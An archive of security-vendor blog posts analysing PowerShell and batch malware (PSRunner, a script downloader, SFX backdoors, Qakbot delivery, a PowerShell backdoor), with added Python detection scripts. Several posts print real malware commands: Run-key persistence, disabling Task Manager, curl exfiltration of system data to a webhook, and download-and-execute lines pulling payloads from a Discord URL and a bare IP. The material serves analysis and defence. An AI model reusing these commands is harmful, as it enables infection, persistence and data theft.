PowerShell Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Trojan:BAT/PSRunner.VS!MSR
https://gridinsoft.com/blogs/trojan-bat-psrunner-vs-msr/
Tue, 23 Jul 2024 18:12:28 +0000

Trojan:BAT/PSRunner.VS!MSR is a detection of malware that executes malicious commands on a compromised system. It does not do much hurt by itself and rather serves for payload delivery & running. Aside from that, it does some basic system reconnaissance and gains persistence for the further payloads.

Trojan:BAT/PSRunner.VS!MSR Overview

Trojan:BAT/PSRunner.VS!MSR is a type of malware detection identifier used by Microsoft Defender antivirus. This heuristic detection applies to batch files (.bat), which are scripts that can execute a series of commands in Windows via PowerShell. Typically, it downloads and executes additional malicious software, making it a simplified version of a dropper. Although less flexible, PSRunner is still capable of making quite a mess in the system.

Trojan:BAT/PSRunner.VS!MSR detection window

Typically, it is spread through email attachments in phishing campaigns. This is the most popular tactic, where emails appear to come from legitimate sources, prompting recipients to open the attachment or click on malicious links. Additionally, the trojan can be downloaded from pirate or malicious websites in the form of cheats and mods for games. In that case, the disguise is not an attachment, but the entire game installer that serves a shell around the malignant script.

Technical Analysis

Let’s delve deeper into how Trojan:BAT/PSRunner.VS!MSR behaves after it infiltrates a system. As a .bat file, it lacks advanced features like sandbox or debugger checks. However, it still attempts to operate as stealthily as possible to avoid being noticed by the user. Upon execution, it hides its own file by setting the hidden and system attributes on itself (%0 expands to the path of the running script):

attrib +h +s %0

Persistence

Next, the malware takes steps to establish persistence in the system. It executes the following commands:

set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul

By doing this, the malicious script creates multiple registry entries, enabling it to run at every system startup. Additionally, it copies the script to the user’s Startup folder to ensure it launches upon system login.

As mentioned earlier, this is simply a script using PowerShell. Unlike more advanced malware, it cannot hide in the Task Manager. This means the user can terminate the process by ending the PowerShell process in the Task Manager. Therefore, the malware’s next step is to disable the Task Manager. It adds the following registry key:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Gathering Information

Next, the malware collects various information about the system. This process is often referred to as system fingerprinting. In this case, the fingerprint is quite detailed. The malware executes the following command:

powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%usErPrOfiLE%\apps.txt"
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\apps.txt %WEbHooK%

This command saves a list of installed applications to a text file named apps.txt and sends it to a remote server. The script then gathers system information into a file named userdata.txt using the following commands:

echo Username %usERnAME% >> userdata.txt
echo IP %IPV4% >> userdata.txt
echo. >> userdata.txt
ipconfig >> userdata.txt
echo. >> userdata.txt
getmac >> userdata.txt
echo. >> userdata.txt
wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status >> userdata.txt
echo. >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
echo. >> userdata.txt
wmic partition get name,size,type >> userdata.txt
echo. >> userdata.txt
systeminfo >> userdata.txt
echo. >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt

After gathering this information, it sends the file to a remote server with the following command:

curl -v -F "chat_id=-655682538" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
del userdata.txt
del apps.txt

By doing this, the malware retrieves and transmits extensive system details, including installed applications, network configurations, hardware specifications, and system information. Finally, it deletes the files userdata.txt and apps.txt to cover its tracks.

Payload

The final stage of the script’s execution involves running the following command:

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
ping 127.0.0.1 3 > "e.txt"
start GetToken.exe

As we can see, the script uses PowerShell to download an executable file named GetToken.exe from Discord servers and then runs it. All the file names involved are chosen to raise as little suspicion as possible.
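To turn the stages above into a repeatable check, here is an added Python example (not code from Gridinsoft or from the dropper itself) that triages a batch file statically: it expands plain set variables so that the mixed-case %rEgINf% reference no longer hides the Run key, matches each line against a short indicator list (self-hiding, persistence, Task Manager tampering, fingerprinting, exfiltration, download cradle, trace removal) and gives a verdict. The sample script is constructed from the commands quoted above, with the chat id, webhook and payload URL replaced by placeholders.

```python
import re

# Constructed sample modelled on the commands quoted in the analysis above.
# The chat id, webhook variable and payload URL are placeholders; this is not
# the real dropper.
SAMPLE_BAT = r"""
attrib +h +s %0
set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
systeminfo >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
curl -v -F "chat_id=PLACEHOLDER_CHAT_ID" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://example.invalid/PLACEHOLDER.exe', 'GetToken.exe')"
del userdata.txt
echo done
"""

# Indicator name -> pattern. Patterns are case-insensitive because cmd.exe is,
# and the dropper relies on that with its randomised capitalisation.
INDICATORS = [
    ("self-hiding",                re.compile(r"\battrib\b.*\+h.*%0", re.I)),
    ("run-key persistence",        re.compile(r"\\CurrentVersion\\Run\b", re.I)),
    ("startup-folder persistence", re.compile(r"\\Programs\\Startup\b", re.I)),
    ("task-manager disabled",      re.compile(r"\bDisableTaskMgr\b", re.I)),
    ("system fingerprinting",      re.compile(r"\b(?:systeminfo|ipconfig|getmac|wmic)\b", re.I)),
    ("data exfiltration",          re.compile(r"\bcurl\b.*\s-F\s", re.I)),
    ("remote payload download",    re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I)),
    ("trace removal",              re.compile(r"\bdel\b\s+\S+\.txt", re.I)),
]

SET_RE = re.compile(r"^\s*set\s+([^=\s\"]+)=(.*)$", re.I)
VAR_RE = re.compile(r"%([^%\s]+)%")


def expand_variables(script: str) -> list[str]:
    """Resolve %VAR% references defined by plain `set name=value` lines.
    Variable names are case-insensitive in cmd.exe, which is why the dropper's
    %rEgINf% still resolves; lower-casing reproduces that. Unknown names are
    left as they are (set "name=value" and delayed expansion are not handled)."""
    env: dict[str, str] = {}
    expanded = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2).strip().strip('"')
        expanded.append(VAR_RE.sub(lambda v: env.get(v.group(1).lower(), v.group(0)), line))
    return expanded


def triage(script: str) -> dict[str, list[str]]:
    """Map each indicator name to the (expanded) lines that triggered it."""
    findings: dict[str, list[str]] = {}
    for line in expand_variables(script):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.setdefault(name, []).append(line)
    return findings


def verdict(findings: dict) -> str:
    """Persistence combined with exfiltration or a download cradle is the
    pattern described above; anything else with hits is merely suspicious."""
    persistence = {"run-key persistence", "startup-folder persistence"} & set(findings)
    staging = {"data exfiltration", "remote payload download"} & set(findings)
    if persistence and staging:
        return "dropper-like"
    if findings:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    result = triage(SAMPLE_BAT)
    for name, lines in result.items():
        print(f"[{name}]")
        for line in lines:
            print("   ", line)
    print("verdict:", verdict(result))
```

Note that the run-key indicator fires twice: once on the set line that defines the key path and once on the reg add line after expansion, which is exactly what an analyst wants to see when the malware splits an indicator across variables.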

How To Remove Trojan:BAT/PSRunner.VS!MSR?

To remove Trojan:BAT/PSRunner.VS!MSR, you need to use an advanced anti-malware solution with a heuristic module. Additionally, it is crucial to maintain continuous system protection to prevent future infections. GridinSoft Anti-Malware is an excellent choice because, in addition to proactive protection, it has an Internet Security module. This will block potentially unsafe sites, thus preventing the infection process at the earliest stage.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

Trojan:Script/Downloader!MSR
https://gridinsoft.com/blogs/trojan-script-downloader-msr/
Wed, 17 Jul 2024 10:17:32 +0000

Trojan:Script/Downloader!MSR is a malicious script that downloads other malware onto the target system. It is most commonly spread through illegal software and fake documents, and is capable of deploying pretty much any malicious program. Due to the complexity and the use of obfuscation, the exact malicious script may remain undetected, while the Defender will display a powershell.exe file as affected.

Trojan:Script/Downloader!MSR Overview

Trojan:Script/Downloader!MSR is a heuristic detection of Microsoft Defender that flags a small malware downloading script. Unlike a full-fledged dropper, this malicious thing is in fact disposable: it never runs again after execution. This loader executes a selection of commands in PowerShell or Command Prompt, which triggers Microsoft Defender. But since this detection is heuristic, and malicious activity comes from the activity within the PS environment, the built-in antivirus says that the powershell.exe is in question.

Trojan:Script/Downloader!MSR is typically spread through common malware methods such as game mods, pirated games, software, activators (KMS), and keygens. It is also distributed under the guise of legitimate files, masked with double extension and an altered file icon. As for the payload, Trojan:Script/Downloader!MSR most often delivers spyware, remote administrative tools, and ransomware.

Technical Analysis

Let’s get into Trojan:Script/Downloader!MSR operations on the target system by analysing the scripts this malware may use. By its nature, it does not perform any checks for the presence of a sandbox. Instead, it immediately executes its function—dropping the payload:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }

As we can see, the malicious script uses PowerShell to download and execute a malicious file. It employs the -ExecutionPolicy Bypass parameter to run the script without security restrictions. -NoExit makes the console window persistent, i.e. it does not close once the command execution is over, so the script can execute other commands. It also uses -WindowStyle Hidden to hide the PowerShell window, so the user does not notice its execution. Finally, Start-Process 'C:\\test-MDATP-test\\invoice.exe' executes the downloaded file.

Basic Code Obfuscation

Although this is a fairly primitive loader script, some obfuscation may be used to make the detection harder. Below, you can see one of the intermediary commands that the script can execute to add a specific registry key. This key may further be a foothold for the malware the script will deploy, for gaining persistence or storing valuable data.

reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

This way, the malware adds a new registry value and sets it to a base64-encoded string, which the next command reads back, decodes and runs through Invoke-Expression (iex). A similar base64-encoded command, passed to powershell.exe through its -e (-EncodedCommand) switch, looks like this:

powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}

Even though base64 is only an encoding that anyone can reverse, the obfuscation makes the script harder to detect.

Is Trojan:Script/Downloader!MSR a False Positive?

Sometimes, Trojan:Script/Downloader!MSR can be detected by antivirus software as a false positive. This mostly occurs when a program lacks a valid certificate and accesses the internet. In some cases, detection happens when the program contacts suspicious IP addresses. Regardless, it is always essential to check such detections to rule out any real threats.

For these purposes, I recommend using GridinSoft Anti-Malware. In addition to scanning and cleaning your system, it provides proactive device protection and Internet Security, which will prevent threats even at the download stage.

SFX Archives Can Sneakily Launch PowerShell
https://gridinsoft.com/blogs/sfx-can-launch-powershell/
Wed, 05 Apr 2023 09:13:33 +0000

CrowdStrike warns that hackers are adding malicious functionality to self-extracting SFX archives containing harmless honeypot files that can launch PowerShell.

This simple trick allows attackers to plant backdoors on victims’ machines without raising an “alarm”.

Let me remind you that we also wrote that Attackers target .NET Developers with Malicious NuGet Packages, and also that Hackers compromised Slack private GitHub repositories.

Also information security specialists warned that Hackers bypass ransomware protection using WinRAR.

The researchers remind that self-extracting archives created with archivers such as WinRAR and 7-Zip are, in fact, executable files that contain archive data along with built-in unpacking functionality.

Access to such files may be password protected to prevent unauthorized access. SFX files were originally created to make it easier to distribute data to users who don’t have a decompressor.

Password-protected SFX file

Recently, Crowdstrike experts discovered an attacker who used stolen credentials to abuse utilman.exe (an accessibility application that can be run before a user logs in) and configured it to run a password-protected SFX file that was previously placed on the system.

SFX can launch PowerShell

The SFX file launched by utilman.exe was password protected and contained an empty text file that acted as a decoy. The real purpose of the archive was to run PowerShell, the Windows command line (cmd.exe) and the “Task Manager” with system privileges.

Further analysis of the threat showed that the attacker added several commands at once, which were run after the target unpacked the archived text file.

SFX can launch PowerShell

As you can see in the screenshot above, the attacker configured the SFX archive in such a way that no dialog boxes were displayed during the extraction process. He also added instructions for launching PowerShell, Command Prompt, and Task Manager.

The fact is that WinRAR offers a set of advanced settings for SFX, which allow adding a list of executable files to be automatically launched before or after the unpacking process, as well as overwrite existing files in the destination folder if files with the same name already exist.

SFX can launch PowerShell

“Because this SFX archive can be launched from the login screen, the attacker effectively had a permanent backdoor that could be accessed to launch PowerShell, Windows Command Prompt, and “Task Manager” with NT AUTHORITY\SYSTEM privileges if the correct password was provided. This type of attack is likely to go unnoticed by traditional antivirus software that looks for malware within the archive itself,” the experts explain.

The researchers remind that users should pay special attention to self-extracting archives and use the appropriate software to check their contents and look for potential scripts and commands scheduled to run on extraction.
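Checking an SFX archive for commands scheduled to run on extraction can be automated. The Python below is an added example, not CrowdStrike's, WinRAR's or Gridinsoft's code: it scans the raw bytes of an SFX file for WinRAR SFX script directives (Setup, Presetup, Silent, Overwrite, Path, TempMode) and rates the combination it finds. It assumes the script comment is stored as plain text inside the archive part of the SFX, which is how WinRAR writes it (if an archiver compressed the comment, extract it with the archiver and pass that text instead). The sample bytes are constructed to mirror the case described above, PowerShell, cmd.exe and Task Manager launched after a silent extraction, and are not a real archive.

```python
import re

# Directives from WinRAR's SFX script language that act without the user asking.
# Names come from WinRAR's SFX documentation; the list is deliberately short.
DIRECTIVES = {
    "Setup":     "program launched after extraction",
    "Presetup":  "program launched before extraction",
    "Silent":    "start dialog or all dialogs suppressed, depending on the value",
    "Overwrite": "existing files replaced without asking",
    "Path":      "extraction folder fixed by the archive",
    "TempMode":  "extract to a temporary folder, then delete",
}
_CANON = {name.lower(): name for name in DIRECTIVES}
DIRECTIVE_RE = re.compile(
    rb"^[ \t]*(setup|presetup|silent|overwrite|path|tempmode)[ \t]*=[ \t]*(.*?)[ \t\r]*$",
    re.I | re.M,
)

# Constructed SFX-like bytes: a fake stub, a RAR 4.x signature and a script
# comment of the kind WinRAR embeds. Not a real archive and not the sample
# from the report.
SAMPLE_SFX = (
    b"MZ" + bytes(62) + b"(constructed stub, not a real PE)" + bytes(32)
    + b"Rar!\x1a\x07\x00" + bytes(8)
    + b";The comment below contains SFX script commands\r\n"
    b"\r\n"
    b"Path=%temp%\r\n"
    b"Setup=powershell.exe\r\n"
    b"Setup=cmd.exe\r\n"
    b"Setup=taskmgr.exe\r\n"
    b"Silent=1\r\n"
    b"Overwrite=1\r\n"
    + bytes(16) + b"decoy.txt" + bytes(32)
)


def scan_sfx_script(data: bytes) -> list[tuple[str, str]]:
    """Return (directive, value) pairs found in the raw bytes, in file order.
    Assumption: the SFX script comment is stored uncompressed in the archive."""
    return [
        (_CANON[m.group(1).decode().lower()], m.group(2).decode("utf-8", "replace"))
        for m in DIRECTIVE_RE.finditer(data)
    ]


def classify(findings: list[tuple[str, str]]) -> str:
    """Rate the directive set: auto-run plus hidden dialogs is the worst case."""
    names = {directive for directive, _ in findings}
    autorun = names & {"Setup", "Presetup"}
    if autorun and "Silent" in names:
        return "high: runs programs on extraction with dialogs hidden"
    if autorun:
        return "medium: runs programs on extraction"
    return "low: no auto-run directives"


def report(data: bytes) -> str:
    findings = scan_sfx_script(data)
    lines = [f"{d}={v}    ({DIRECTIVES[d]})" for d, v in findings]
    return "\n".join(lines + ["rating: " + classify(findings)])


if __name__ == "__main__":
    print(report(SAMPLE_SFX))
```

Because the scan works on raw bytes, a directive string that happens to occur inside compressed data could produce a false hit; treat the output as a triage signal and confirm by opening the archive's comment in the archiver.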

Qakbot Malware Applies New Distribution Methods
https://gridinsoft.com/blogs/new-qakbot-spreading-ways/
Wed, 01 Mar 2023 11:53:57 +0000

Today there is an arms race between cybercriminals and antimalware manufacturers. While some release a fix for an existing threat, others must develop new loopholes. Recently, cybersecurity experts noticed that many malware families were using OneNote attachments to infect their victims. Since OneNote is considered a robust application that Microsoft has developed for easy note-taking, hackers couldn’t help but take advantage of it for their nefarious purposes. Next, we will look at some relatively new ways of spreading the known Qakbot banking Trojan.

What is Qbot?

Before moving on to distribution methods, let’s recap QakBot. Qakbot Malware (QuakBot, or QBot) is a banking Trojan designed to steal confidential information from Windows computers. For starters, it is worth mentioning that this type of malware is nothing new, and it appeared in 2007. Since then, it has undergone many changes, primarily aimed at bypassing security features. What has stayed the same, however, is the distribution method. For the most part, it’s email spam. However, after infecting one machine, QakBot can spread to other devices on the network.

Furthermore, it has a modular structure, so the operator can fully customize it to the objectives at hand: network reconnaissance, keylogging, credential theft, botnet deployment, or ransomware. In some cases, botnets under the control of QakBot were delivering Cobalt Strike beacons.

Distribution via OneNote Using Batch & PowerShell

The primary method of spreading Qakbot is through e-mail spamming. Previously, a rogue email contained an MS Office file with a malicious macro hidden inside. However, after Microsoft forcibly disabled the execution of any macros coming from the Internet, Qakbot started attaching the OneNote attachment. Usually, such an email contains something like “RE: DRCP Hire-Success Story…” and attachments are usually masked as legitimate files and named, for example, “Contracts – Copy.one”.

A fake cloud attachment page opens when the victim opens the OneNote attachment. Its purpose is to get the victim to click on the BAT file (let’s call it Open.bat) that is embedded in Contracts – Copy.one. As soon as the user runs this file, a PowerShell script starts, which in turn drops a CMD file (named, say, i.cmd) into the %temp% folder and runs it. This happens hidden from the user, without any notifications. It then uses a PowerShell script to download a GIF file with the Invoke-WebRequest cmdlet. Although this file is saved as a JPG in %programdata%, it has nothing to do with image files: it is an executable Qakbot DLL, which Rundll32.exe runs with the “Wind” parameter.

QakBot Delivery Mechanism Using JScript and Batch Script

Distribution Via OneNote Using Jscript (.jse) file

Similarly to the previous method, the infection starts with phishing emails that also carry a OneNote attachment. Unlike the previous case, however, this attachment includes a JSE file. This file also contains a hidden BAT file, usually disguised as an “Open” button. After the user clicks this button, the batch file is launched, and a PowerShell script downloads the pseudo-GIF file into the Temp system folder. This file, too, is not what it looks like: it is an executable Qakbot DLL, which performs the same unpacking routine as in every other scenario.

QakBot Delivery Mechanism Using JScript and Batch Script

Distribution Using HTML Application (.hta) File

At the end of January 2023, Qakbot operators began experimenting with this new distribution method. It is identical to the previous way, except that instead of a JSE file, OneNote files contain an embedded HTML application (HTA file). When the user clicks “open” on the OneNote page, it drops an embedded .hta file, which mshta.exe executes in the background. The script in the HTA file uses the legitimate curl.exe application to load the Qakbot DLL file into the C:\ProgramData folder and then run it. The Qakbot payload is injected into the Windows Assistive Technology Manager (AtBroker.exe) to hide its presence.
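The OneNote variants above all hinge on a file embedded in the .one attachment. As an added example (not Gridinsoft's code and not a tool from the research cited), the Python below carves embedded files out of a .one blob using the FileDataStoreObject layout from Microsoft's MS-ONESTORE specification (a header GUID, a 64-bit length, 12 reserved bytes, the data, a footer GUID) and classifies each one by its leading bytes, so a batch, HTA, WSF or PE payload hidden behind an “Open” button shows up before anyone clicks it. The .one blob is constructed for the demo from three small payloads; the GUIDs and field offsets are taken from the specification as an assumption, not measured from a real sample.

```python
import re
import struct

# GUIDs that bracket a FileDataStoreObject (embedded file) in a .one file per
# MS-ONESTORE, written in their on-disk little-endian byte order.
STORE_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")  # {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
STORE_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")  # {71FBA722-0F79-4A0B-BB13-899256426B24}
DATA_OFFSET = 16 + 8 + 4 + 8  # guidHeader, cbLength (uint64), unused, reserved

SCRIPT_KINDS = {"PE executable", "HTML application", "Windows Script File",
                "batch script", "JScript/VBScript"}


def classify_payload(data: bytes) -> str:
    """Cheap magic-byte / keyword classification of an embedded file."""
    head = data[:4096]
    low = head.lower().lstrip()
    if head.startswith(b"MZ"):
        return "PE executable"
    if head.startswith((b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")):
        return "image"
    if b"<hta:application" in low:
        return "HTML application"
    if low.startswith((b"<?xml", b"<job", b"<package")) and b"<job" in low:
        return "Windows Script File"
    if re.match(rb"@?(?:echo|start|cmd|powershell|set|call)\b", low):
        return "batch script"
    if b"activexobject" in low or b"wscript." in low or b"createobject(" in low:
        return "JScript/VBScript"
    return "unknown"


def carve_embedded_files(blob: bytes) -> list[dict]:
    """Walk every FileDataStoreObject in the blob and return its payload."""
    found = []
    pos = 0
    while (pos := blob.find(STORE_HEADER, pos)) != -1:
        if pos + DATA_OFFSET > len(blob):
            break
        (length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + DATA_OFFSET
        data = blob[start:start + length]
        kind = classify_payload(data)
        found.append({
            "offset": start,
            "length": length,
            "kind": kind,
            "executable": kind in SCRIPT_KINDS,
            "footer_ok": blob[start + length:start + length + 16] == STORE_FOOTER,
            "data": data,
        })
        pos = start + max(length, 1)
    return found


def _store(data: bytes) -> bytes:
    """Wrap data the way a .one file stores an embedded file (demo helper)."""
    return STORE_HEADER + struct.pack("<Q", len(data)) + bytes(4) + bytes(8) + data + STORE_FOOTER


# Constructed .one-like blob: a tiny batch file that starts hidden PowerShell,
# a minimal PE stub and a PNG header, separated by filler bytes.
SAMPLE_BAT = b"@echo off\r\nstart /min powershell -w hidden -c \"Write-Host constructed-sample\"\r\n"
SAMPLE_EXE = b"MZ\x90\x00" + bytes(60) + b"PE\x00\x00" + bytes(40)
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(24)
SAMPLE_ONE = (bytes(64) + _store(SAMPLE_BAT) + bytes(17) + _store(SAMPLE_EXE)
              + bytes(9) + _store(SAMPLE_PNG) + bytes(64))


if __name__ == "__main__":
    for item in carve_embedded_files(SAMPLE_ONE):
        flag = "!!" if item["executable"] else "  "
        print(f"{flag} offset={item['offset']:<6} len={item['length']:<5} {item['kind']}")
```

The carver trusts the cbLength field, so a malformed length simply yields a short slice and a failed footer check rather than an exception; the footer_ok flag is the cue to treat such an object with suspicion.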

Distribution using Windows Script (.wsf) Files

In this case, the phishing email contains an attachment in the form of a zip file with a random name, e.g., “Shared Document From Cloud 540318.zip”. There may be several files in the archive, including a WSF file. This file contains malicious JScript between digital certificates. Hence, when a victim tries to open the .wsf file, it runs code that downloads the Qakbot DLL file. Usually, it is loaded into the C:\ProgramData directory and run using “Rundll32.exe” with the parameter “Wind”.

Qakbot Delivery Mechanism using wsf file

Distribution using Google Ads

Since Microsoft blocks macro execution by default in Office files downloaded from the Internet, attackers are finding ever more sophisticated ways to distribute malware. Lately, there has been a significant surge in malicious advertising that leads to a fake page for a legitimate program. Instead of the legitimate program, the user receives malware, usually a .exe or .msi file that contains the payload padded with many empty sections: the inflated file exceeds the size limit of anti-malware engines and so avoids being scanned.

Fake LibreOffice ad that tries to mimic the original site’s URL

How to avoid Qakbot Malware infection

To minimize the risk of Qakbot Malware infection, we recommend following cyber hygiene practices and the recommendations below:

Conclusion

The Qakbot malware provides a prime example of how the threat landscape is changing. Its complex structure, impact, and distribution underscore the importance of maintaining cybersecurity vigilance. Moreover, as discussed at the outset, attackers using Qakbot consistently adapt their methods, using innovative attack vectors such as OneNote attachments and Google Ads to avoid detection, reinforcing the need for proactive and robust security measures.

New PowerShell Backdoor Masquerades as a Windows Update
https://gridinsoft.com/blogs/new-powershell-backdoor/
Thu, 20 Oct 2022 10:45:24 +0000

Cybersecurity experts from SafeBreach have found a new, previously undocumented and “undetectable” PowerShell backdoor, which is actively used by hackers and has been used to attack at least 69 targets.

Let me remind you that we also wrote that Germans Interested in the Situation in Ukraine Are Attacked by the PowerShell RAT Malware.

“The PowerShell backdoor is a stealthy tool of its own design and its associated command and control servers appear to be the work of a sophisticated unknown attacker, who already has about 100 victims,” the researchers note in their report.

The backdoor spreads through spear phishing, as part of malicious Word documents that are usually disguised as job offers. When such a document is opened, a macro is triggered within it that delivers the updater.vbs PowerShell script to the victim’s computer, which creates a scheduled task claiming to be part of a Windows update.

Bait from the hacker’s letter

The VBS script executes two other PowerShell scripts (Script.ps1 and Temp.ps1), which are stored obfuscated inside the malicious document itself. When SafeBreach analysts first discovered these scripts, none of the products featured on VirusTotal identified them as malicious.
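A defender can look for the scheduled task described above without knowing its exact name. The Python below is an added example, not SafeBreach's or Gridinsoft's code: it reads the CSV produced by schtasks /query /v /fo csv and flags tasks whose name imitates Windows Update or Microsoft while the action launches a script host from a user-writable folder. The CSV is a constructed excerpt limited to the columns the check uses (real output has many more), and the file names in the flagged row are the ones mentioned in the report.

```python
import csv
import io
import re

# Constructed excerpt of `schtasks /query /v /fo csv` output, reduced to the
# columns used below. Row 2 is modelled on the behaviour described above: a task
# that claims to be a Windows update but runs a PowerShell script from the
# user's profile. Host and user names are placeholders.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Author","Task To Run","Run As User"
"HOST1","\Microsoft\Windows\WindowsUpdate\Scheduled Start","Microsoft Corporation","%windir%\system32\sc.exe start wuauserv","SYSTEM"
"HOST1","\Windows Update Check","HOST1\user","powershell.exe -WindowStyle Hidden -File ""C:\Users\user\AppData\Local\Temp\Script.ps1""","user"
"HOST1","\Maintenance\Backup","HOST1\admin","""C:\Program Files\Backup\backup.exe"" /nightly","admin"
'''

LOOKALIKE = re.compile(r"windows.*update|update.*windows|microsoft|defender", re.I)
SCRIPT_HOST = re.compile(r"\b(?:wscript|cscript|powershell|pwsh|mshta|rundll32|regsvr32)(?:\.exe)?\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Public|ProgramData|Downloads)\\|%(?:appdata|localappdata|temp|tmp|public)%", re.I)
SYSTEM_DIR = re.compile(r'^"?(?:%SystemRoot%|%windir%|C:\\Windows)\\', re.I)


def assess_task(row: dict) -> list[str]:
    """Return the reasons a task looks like a disguised persistence entry."""
    name, action = row["TaskName"], row["Task To Run"]
    reasons = []
    if SCRIPT_HOST.search(action):
        reasons.append("action launches a script host")
    if USER_WRITABLE.search(action):
        reasons.append("action runs from a user-writable folder")
    if LOOKALIKE.search(name) and not SYSTEM_DIR.match(action):
        reasons.append("name imitates a Microsoft task but action is outside the Windows directory")
    if row.get("Run As User", "").upper() == "SYSTEM" and USER_WRITABLE.search(action):
        reasons.append("runs as SYSTEM from a user-writable folder")
    return reasons


def triage_schtasks(csv_text: str) -> list[tuple[str, list[str]]]:
    """Parse schtasks CSV output and return (task name, reasons) for flagged tasks."""
    flagged = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = assess_task(row)
        if reasons:
            flagged.append((row["TaskName"], reasons))
    return flagged


if __name__ == "__main__":
    for task, reasons in triage_schtasks(SAMPLE_SCHTASKS_CSV):
        print(task)
        for r in reasons:
            print("   -", r)
```

The genuine Windows Update task in the sample passes because its action lives under %windir%, which is the distinction the check relies on: the name is easy to imitate, the location of the action is not.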

New PowerShell Backdoor

Script.ps1 connects to the C&C servers of the attackers, sends the victim ID to its operators, and then waits for further commands, which it receives in encrypted form (AES-256 CBC). Based on the count of such identifiers, the analysts could conclude that about 69 victims were registered on the attackers’ control servers, which probably corresponds to the approximate number of hacked computers.

The Temp.ps1 script, in turn, decodes the commands received from the server as a response, executes them, and then encrypts and uploads the result via a POST request to the control server.

The experts created a script that deciphered the commands of the malware operators, and found that two-thirds of them were intended to steal data, and the rest were used to compile lists of users, files, delete files and accounts, and also compile lists of RDP clients.

Researchers believe that this PowerShell backdoor seems to be created by some previously unknown attackers, and so far there is too little data to talk about the attribution of these attacks.
